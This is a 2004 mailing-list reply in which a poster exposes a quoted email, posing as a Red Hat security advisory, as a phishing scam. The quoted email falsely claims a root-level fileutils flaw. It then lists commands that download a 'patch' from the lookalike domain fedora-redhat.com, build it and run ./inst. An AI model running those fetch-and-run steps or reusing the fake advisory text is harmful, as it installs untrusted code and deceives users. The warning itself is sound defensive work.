Just incase anyone was under the misimpression that this is for real, it's not; I see no record of this vuln. elsewhere and whois records show no affiliation between fedora-redhat.com and redhat.com. Looks like the Linux equivalent of all those fake MS security warnings. Athul On Sun, 24 Oct 2004 17:16:21 -0500, RedHat Security Team <security@xxxxxxxxxx> wrote: > > > > > > > Original issue date: October 20, 2004 > Last revised: October 20, 2004 > Source: RedHat > > A complete revision history is at the end of this file. > > Dear RedHat user, > > Redhat found a vulnerability in fileutils (ls and mkdir), that could allow > a remote attacker to execute arbitrary code with root privileges. Some of > the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, > RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD > and Solaris platforms are NOT affected. > > The RedHat Security Team strongly advises you to immediately apply the > fileutils-1.0.6 patch. This is a critical-critical update that you must > make by following these steps: > First download the patch from the Security RedHat mirror: > wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz > Untar the patch: > tar zxvf fileutils-1.0.6.patch.tar.gz > > cd fileutils-1.0.6.patch > > make > > ./inst > > Again, please apply this patch as soon as possible or you risk your system > and others` to be compromised. > > Thank you for your prompt attention to this serious matter, > > RedHat Security Team. > > Copyright © 2004 Red Hat, Inc. All rights reserved. -- Kernelnewbies: Help > each other learn about the Linux kernel. Archive: > http://mail.nl.linux.org/kernelnewbies/ FAQ: http://kernelnewbies.org/faq/ -- Kernelnewbies: Help each other learn about the Linux kernel. Archive: http://mail.nl.linux.org/kernelnewbies/ FAQ: http://kernelnewbies.org/faq/
